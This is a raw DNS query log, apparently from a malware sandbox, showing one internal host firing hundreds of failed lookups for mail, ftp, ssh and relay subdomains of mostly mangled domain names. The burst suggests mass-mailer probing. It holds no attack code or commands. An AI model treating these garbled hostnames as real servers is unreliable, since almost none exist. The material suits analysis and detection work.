Nov 30, 2023 11:23:28.316579103 CET	1.1.1.1	192.168.2.4	0x7630	Name error (3)	h.tlgcom	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.316998959 CET	1.1.1.1	192.168.2.4	0xc66a	Name error (3)	mail.aclfpxvr.nedwc	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.317958117 CET	1.1.1.1	192.168.2.4	0x8d6	Name error (3)	mailgate.ytgaig.tcueain.ch	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.321316004 CET	1.1.1.1	192.168.2.4	0x139	Name error (3)	mail.gadtolsr2l1l.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.321753979 CET	1.1.1.1	192.168.2.4	0x69b2	Name error (3)	ftp.amerite.varym	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.322047949 CET	1.1.1.1	192.168.2.4	0x4748	Name error (3)	mailgate.naburly26a.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.322278976 CET	1.1.1.1	192.168.2.4	0x162b	Name error (3)	relay.md.coyar.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.322971106 CET	1.1.1.1	192.168.2.4	0x7da7	Name error (3)	mailgate.hi9tail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.328624010 CET	1.1.1.1	192.168.2.4	0x5c88	Name error (3)	mail.il.cam	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.328638077 CET	1.1.1.1	192.168.2.4	0x5d2f	Name error (3)	mailgate.yma4j.net	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.333194017 CET	1.1.1.1	192.168.2.4	0xe1c	Name error (3)	relay.n.zcom	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.333250999 CET	1.1.1.1	192.168.2.4	0xa273	Name error (3)	pop3.eok5ofmail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.352786064 CET	1.1.1.1	192.168.2.4	0x4230	Name error (3)	ssh.liks.cohlm	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.353434086 CET	1.1.1.1	192.168.2.4	0xffa4	Name error (3)	ftp.avabme220ail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.354212046 CET	1.1.1.1	192.168.2.4	0x421	Name error (3)	ftp.il.cam	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.354265928 CET	1.1.1.1	192.168.2.4	0x3373	Name error (3)	mail.avabme220ail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.361637115 CET	1.1.1.1	192.168.2.4	0x6f00	No error (0)	mail.apee.com		64.190.63.111	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.361649036 CET	1.1.1.1	192.168.2.4	0xd018	Name error (3)	mail.tele8mail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.365175962 CET	1.1.1.1	192.168.2.4	0x635f	Name error (3)	ssh.amerite.varym	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.365520954 CET	1.1.1.1	192.168.2.4	0xaed2	Name error (3)	ssh.gadtolsr2l1l.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.367717981 CET	1.1.1.1	192.168.2.4	0xc84a	Name error (3)	ssh.m1ukgoy8a.ua	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.369349003 CET	1.1.1.1	192.168.2.4	0x8b3b	Name error (3)	mailgate.xezail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.372140884 CET	1.1.1.1	192.168.2.4	0xde06	Name error (3)	ftp.tele8mail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.372942924 CET	1.1.1.1	192.168.2.4	0x22a1	Name error (3)	mail.s93ail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.376008987 CET	1.1.1.1	192.168.2.4	0xa273	Name error (3)	pop3.eok5ofmail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.380317926 CET	1.1.1.1	192.168.2.4	0x8c85	Name error (3)	ssh.sdas.d20ail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.410619974 CET	1.1.1.1	192.168.2.4	0x9552	Name error (3)	pop3.hitamoelka237lil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.420348883 CET	1.1.1.1	192.168.2.4	0x8410	Name error (3)	mailgate.e1a73a.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.423933029 CET	1.1.1.1	192.168.2.4	0xadbe	Name error (3)	mail.gco.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.423969030 CET	1.1.1.1	192.168.2.4	0xadbe	Name error (3)	mail.gco.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.430099010 CET	1.1.1.1	192.168.2.4	0x7ed6	Name error (3)	imap.ciszxujgaiatail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.430298090 CET	1.1.1.1	192.168.2.4	0x85fc	Name error (3)	pop3.ciszxujgaiatail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.434930086 CET	1.1.1.1	192.168.2.4	0xe7c2	Name error (3)	mailgate.joaionlnal.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.443010092 CET	1.1.1.1	192.168.2.4	0xcc94	Name error (3)	relay.6eyaok.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.443089008 CET	1.1.1.1	192.168.2.4	0xf747	Name error (3)	imap.gmaso.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.443120956 CET	1.1.1.1	192.168.2.4	0xf747	Name error (3)	imap.gmaso.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.471925020 CET	1.1.1.1	192.168.2.4	0x9755	Name error (3)	ssh.aclfpxvr.nedwc	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.471997976 CET	1.1.1.1	192.168.2.4	0xadb1	Name error (3)	mailgate.ideo1e.priisav.06eieic.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.472712994 CET	1.1.1.1	192.168.2.4	0xdca3	Name error (3)	ssh.il.cam	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.486828089 CET	1.1.1.1	192.168.2.4	0x8c7f	Name error (3)	ssh.avabme220ail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.514254093 CET	1.1.1.1	192.168.2.4	0xf307	Name error (3)	pop.liks.cohlm	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.518744946 CET	1.1.1.1	192.168.2.4	0x84fa	Name error (3)	mailgate.eok5ofmail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.534475088 CET	1.1.1.1	192.168.2.4	0x92e6	Name error (3)	mailgate.dtianekicomail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.539151907 CET	1.1.1.1	192.168.2.4	0xa933	Name error (3)	mailgate.gw.ky	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.543529034 CET	1.1.1.1	192.168.2.4	0xf926	Name error (3)	ssh.gporaja.co.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.563168049 CET	1.1.1.1	192.168.2.4	0x92e6	Name error (3)	mailgate.dtianekicomail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.563447952 CET	1.1.1.1	192.168.2.4	0xcc94	Name error (3)	relay.6eyaok.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.585611105 CET	1.1.1.1	192.168.2.4	0x4958	Name error (3)	ssh.s93ail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.592991114 CET	1.1.1.1	192.168.2.4	0x8d0c	Name error (3)	mailgate.hitamoelka237lil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.629488945 CET	1.1.1.1	192.168.2.4	0xa121	Name error (3)	smtp.xezail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.665115118 CET	1.1.1.1	192.168.2.4	0xc1ef	Name error (3)	pop.m1ukgoy8a.ua	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.671860933 CET	1.1.1.1	192.168.2.4	0xeb97	Name error (3)	pop.gporaja.co.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.678617954 CET	1.1.1.1	192.168.2.4	0xf74e	Name error (3)	ssh.tele8mail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.679337978 CET	1.1.1.1	192.168.2.4	0xfb10	Name error (3)	pop.aclfpxvr.nedwc	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.681727886 CET	1.1.1.1	192.168.2.4	0x4d2d	Name error (3)	ftp.h.tlgcom	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.687668085 CET	1.1.1.1	192.168.2.4	0x1e1a	Name error (3)	pop.sdas.d20ail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.705328941 CET	1.1.1.1	192.168.2.4	0x4958	Name error (3)	ssh.s93ail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.708791018 CET	1.1.1.1	192.168.2.4	0x1b70	Name error (3)	imap.liks.cohlm	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.716701984 CET	1.1.1.1	192.168.2.4	0x52f2	Name error (3)	imap.m1ukgoy8a.ua	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.720283031 CET	1.1.1.1	192.168.2.4	0xd6c7	Name error (3)	pop.avabme220ail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.731869936 CET	1.1.1.1	192.168.2.4	0xa68d	Name error (3)	pop.amerite.varym	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.732487917 CET	1.1.1.1	192.168.2.4	0x9858	Name error (3)	smtp.joaionlnal.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.734862089 CET	1.1.1.1	192.168.2.4	0xf74e	Name error (3)	ssh.tele8mail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.736156940 CET	1.1.1.1	192.168.2.4	0x28cd	Name error (3)	mail.h.tlgcom	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.760574102 CET	1.1.1.1	192.168.2.4	0xc2ae	Name error (3)	pop.il.cam	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.761724949 CET	1.1.1.1	192.168.2.4	0xfc81	Name error (3)	pop.tele8mail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.763482094 CET	1.1.1.1	192.168.2.4	0x108c	Name error (3)	pop.s93ail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.771048069 CET	1.1.1.1	192.168.2.4	0x19f9	Name error (3)	imap.z-a.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.800512075 CET	1.1.1.1	192.168.2.4	0x8bfa	Name error (3)	ssh.h.tlgcom	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.800906897 CET	1.1.1.1	192.168.2.4	0x8a8	Name error (3)	imap.amerite.varym	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.802259922 CET	1.1.1.1	192.168.2.4	0xea95	Name error (3)	relay.joaionlnal.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.803195000 CET	1.1.1.1	192.168.2.4	0xcf58	Name error (3)	imap.sdas.d20ail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.805131912 CET	1.1.1.1	192.168.2.4	0xddf1	Name error (3)	mailgate.ciszxujgaiatail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.807296038 CET	1.1.1.1	192.168.2.4	0x5316	Name error (3)	smtp.e1a73a.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.812174082 CET	1.1.1.1	192.168.2.4	0x85b7	Name error (3)	smtp.ideo1e.priisav.06eieic.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.826937914 CET	1.1.1.1	192.168.2.4	0x212e	Name error (3)	imap.aclfpxvr.nedwc	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.833380938 CET	1.1.1.1	192.168.2.4	0x945d	Name error (3)	pop.gadtolsr2l1l.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.837141037 CET	1.1.1.1	192.168.2.4	0x762c	Name error (3)	imap.il.cam	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.852111101 CET	1.1.1.1	192.168.2.4	0xeed0	Name error (3)	relay.xezail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.861418962 CET	1.1.1.1	192.168.2.4	0x55da	Name error (3)	relay.ideo1e.priisav.06eieic.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.881118059 CET	1.1.1.1	192.168.2.4	0x75b6	Name error (3)	imap.avabme220ail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.958447933 CET	1.1.1.1	192.168.2.4	0x945d	Name error (3)	pop.gadtolsr2l1l.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.973988056 CET	1.1.1.1	192.168.2.4	0x220a	Name error (3)	smtp.hitamoelka237lil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.976615906 CET	1.1.1.1	192.168.2.4	0xd006	Name error (3)	co.uycom	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:28.977550983 CET	1.1.1.1	192.168.2.4	0xf94d	Name error (3)	telenico8a-.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:28.978379965 CET	1.1.1.1	192.168.2.4	0xbeef	Name error (3)	y.latm	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:28.979127884 CET	1.1.1.1	192.168.2.4	0xd02a	Name error (3)	smtp.gw.ky	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.980946064 CET	1.1.1.1	192.168.2.4	0x73ba	Name error (3)	g.cojsuuol.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:28.984047890 CET	1.1.1.1	192.168.2.4	0xf2e6	Name error (3)	imap.tele8mail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:28.988357067 CET	1.1.1.1	192.168.2.4	0xc65c	Name error (3)	7slembyjtczr.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:29.019665956 CET	1.1.1.1	192.168.2.4	0x8807	Name error (3)	smtp.eok5ofmail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.023981094 CET	1.1.1.1	192.168.2.4	0xe182	Name error (3)	imap.gco.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.034190893 CET	1.1.1.1	192.168.2.4	0x2752	Name error (3)	imap.gporaja.co.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.039287090 CET	1.1.1.1	192.168.2.4	0x39f2	Name error (3)	gm2008l.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:29.051119089 CET	1.1.1.1	192.168.2.4	0x79f8	Name error (3)	jdmesbowkeo1abrnet.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:29.057246923 CET	1.1.1.1	192.168.2.4	0xe41a	Name error (3)	reyne5rzkhof1bet.be	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:29.058965921 CET	1.1.1.1	192.168.2.4	0xef1e	Name error (3)	pop3.liks.cohlm	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.065080881 CET	1.1.1.1	192.168.2.4	0xf340	Name error (3)	vettguormebuhn.il.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:29.065548897 CET	1.1.1.1	192.168.2.4	0xd799	Name error (3)	imap.s93ail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.069372892 CET	1.1.1.1	192.168.2.4	0x49d3	Name error (3)	relay.e1a73a.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.071950912 CET	1.1.1.1	192.168.2.4	0x3ce8	Name error (3)	smtp.ciszxujgaiatail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.078746080 CET	1.1.1.1	192.168.2.4	0x1cf	Name error (3)	imap.gadtolsr2l1l.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.080569029 CET	1.1.1.1	192.168.2.4	0x597a	Name error (3)	telenico8a-.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.087692976 CET	1.1.1.1	192.168.2.4	0xb096	Name error (3)	co.uycom	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.094383955 CET	1.1.1.1	192.168.2.4	0x725b	Name error (3)	relay.gw.ky	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.094866991 CET	1.1.1.1	192.168.2.4	0x3b29	Name error (3)	tdwbknlil.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:29.101166964 CET	1.1.1.1	192.168.2.4	0x65fb	Name error (3)	y.latm	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.101402044 CET	1.1.1.1	192.168.2.4	0xd98f	Name error (3)	g.cojsuuol.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.101583004 CET	1.1.1.1	192.168.2.4	0x4296	Name error (3)	pop3.m1ukgoy8a.ua	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.104491949 CET	1.1.1.1	192.168.2.4	0x856a	Name error (3)	tdwbknlil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.105750084 CET	1.1.1.1	192.168.2.4	0xe039	Name error (3)	pop3.aclfpxvr.nedwc	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.116964102 CET	1.1.1.1	192.168.2.4	0xef5d	Name error (3)	jdmesbowkeo1abrnet.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.123198986 CET	1.1.1.1	192.168.2.4	0x33f	Name error (3)	pop3.sdas.d20ail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.145735025 CET	1.1.1.1	192.168.2.4	0x19ad	Name error (3)	relay.eok5ofmail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.158210993 CET	1.1.1.1	192.168.2.4	0xf3e	Name error (3)	7slembyjtczr.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.169800043 CET	1.1.1.1	192.168.2.4	0x2c08	Name error (3)	vettguormebuhn.il.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.176343918 CET	1.1.1.1	192.168.2.4	0x9567	Name error (3)	relay.naburly26a.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.179754972 CET	1.1.1.1	192.168.2.4	0x42c9	Name error (3)	relay.hi9tail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.181320906 CET	1.1.1.1	192.168.2.4	0x4ca8	Name error (3)	pop3.gporaja.co.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.183345079 CET	1.1.1.1	192.168.2.4	0xc8bf	Name error (3)	pop3.avabme220ail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.185534954 CET	1.1.1.1	192.168.2.4	0xdbad	Name error (3)	relay.yma4j.net	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.206593037 CET	1.1.1.1	192.168.2.4	0x1cf	Name error (3)	imap.gadtolsr2l1l.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.208858013 CET	1.1.1.1	192.168.2.4	0x3a6a	Name error (3)	relay.aal.netc	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.222693920 CET	1.1.1.1	192.168.2.4	0x7a10	Name error (3)	gm2008l.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.225024939 CET	1.1.1.1	192.168.2.4	0xdb31	Name error (3)	pop3.tele8mail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.232461929 CET	1.1.1.1	192.168.2.4	0x2438	Name error (3)	pop.h.tlgcom	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.234142065 CET	1.1.1.1	192.168.2.4	0xc796	Name error (3)	pop3.amerite.varym	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.241961956 CET	1.1.1.1	192.168.2.4	0xe6b9	Name error (3)	relay.hmam.comtmail.co.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.243977070 CET	1.1.1.1	192.168.2.4	0x98d7	Name error (3)	relay.ciszxujgaiatail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.256650925 CET	1.1.1.1	192.168.2.4	0xcd4c	Name error (3)	imap.h.tlgcom	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.258305073 CET	1.1.1.1	192.168.2.4	0xf790	Name error (3)	relay.dtianekicomail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.258943081 CET	1.1.1.1	192.168.2.4	0xa7e5	Name error (3)	mailgate.liks.cohlm	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.265583992 CET	1.1.1.1	192.168.2.4	0x723	Name error (3)	pop3.gadtolsr2l1l.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.284920931 CET	1.1.1.1	192.168.2.4	0x8974	Name error (3)	pop3.s93ail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.285233974 CET	1.1.1.1	192.168.2.4	0xe734	Name error (3)	relay.otzaail.co.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.292613983 CET	1.1.1.1	192.168.2.4	0xe442	Name error (3)	relay.hitamoelka237lil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.295710087 CET	1.1.1.1	192.168.2.4	0x4e16	Name error (3)	relay.ytgaig.tcueain.ch	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.307676077 CET	1.1.1.1	192.168.2.4	0xe220	Name error (3)	pop3.il.cam	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.331499100 CET	1.1.1.1	192.168.2.4	0x19ad	Name error (3)	relay.eok5ofmail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.339793921 CET	1.1.1.1	192.168.2.4	0x1afd	Name error (3)	mailgate.sdas.d20ail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.344846010 CET	1.1.1.1	192.168.2.4	0x77e2	Name error (3)	relay.sotuvhlp.cz	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.345906973 CET	1.1.1.1	192.168.2.4	0x888	Name error (3)	mailgate.z-a.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.346385002 CET	1.1.1.1	192.168.2.4	0xa293	Name error (3)	mailgate.gmaso.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.346415997 CET	1.1.1.1	192.168.2.4	0xa293	Name error (3)	mailgate.gmaso.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.361684084 CET	1.1.1.1	192.168.2.4	0xe442	Name error (3)	relay.hitamoelka237lil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.377104044 CET	1.1.1.1	192.168.2.4	0xcc23	Name error (3)	mailgate.aclfpxvr.nedwc	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.384653091 CET	1.1.1.1	192.168.2.4	0x3a7a	Name error (3)	mailgate.il.cam	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.387530088 CET	1.1.1.1	192.168.2.4	0x1959	Name error (3)	mailgate.amerite.varym	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.400933027 CET	1.1.1.1	192.168.2.4	0x5519	Name error (3)	mailgate.m1ukgoy8a.ua	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.443418026 CET	1.1.1.1	192.168.2.4	0x29ad	Name error (3)	relay.hmsn.il.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.443430901 CET	1.1.1.1	192.168.2.4	0x29ad	Name error (3)	relay.hmsn.il.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.458193064 CET	1.1.1.1	192.168.2.4	0x77e2	Name error (3)	relay.sotuvhlp.cz	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.458946943 CET	1.1.1.1	192.168.2.4	0x17ff	Name error (3)	22.12l.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:29.458987951 CET	1.1.1.1	192.168.2.4	0x17ff	Name error (3)	22.12l.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:29.464268923 CET	1.1.1.1	192.168.2.4	0x77d7	Name error (3)	mailgate.avabme220ail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.508846045 CET	1.1.1.1	192.168.2.4	0x8efc	Name error (3)	22.12l.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.508851051 CET	1.1.1.1	192.168.2.4	0x8efc	Name error (3)	22.12l.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.569499969 CET	1.1.1.1	192.168.2.4	0x917d	Name error (3)	reyne5rzkhof1bet.be	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.569513083 CET	1.1.1.1	192.168.2.4	0x917d	Name error (3)	reyne5rzkhof1bet.be	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.586023092 CET	1.1.1.1	192.168.2.4	0x3d14	Name error (3)	smtp.liks.cohlm	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.608716965 CET	1.1.1.1	192.168.2.4	0x5fa8	Name error (3)	mail.co.uycom	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.666831017 CET	1.1.1.1	192.168.2.4	0x5fe8	Name error (3)	mail.y.latm	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.675724983 CET	1.1.1.1	192.168.2.4	0x6a1d	Name error (3)	ftp.co.uycom	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.677181959 CET	1.1.1.1	192.168.2.4	0xd266	Name error (3)	mailgate.gporaja.co.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.678694010 CET	1.1.1.1	192.168.2.4	0xbbfd	Name error (3)	ftp.telenico8a-.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.685945034 CET	1.1.1.1	192.168.2.4	0xc8d3	Name error (3)	ftp.y.latm	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.689560890 CET	1.1.1.1	192.168.2.4	0xe549	Name error (3)	ftp.g.cojsuuol.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.699057102 CET	1.1.1.1	192.168.2.4	0x2564	Name error (3)	smtp.aclfpxvr.nedwc	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.701948881 CET	1.1.1.1	192.168.2.4	0xa2ad	Name error (3)	ftp.tdwbknlil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.702625036 CET	1.1.1.1	192.168.2.4	0xd9fc	Name error (3)	smtp.m1ukgoy8a.ua	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.706291914 CET	1.1.1.1	192.168.2.4	0xee68	Name error (3)	mailgate.s93ail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.717545033 CET	1.1.1.1	192.168.2.4	0xf831	Name error (3)	mail.telenico8a-.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:29.730088949 CET	1.1.1.1	192.168.2.4	0x7c7	Name error (3)	mail.7slembyjtczr.com	none	none	A (IP address)	IN (0x0001)	false
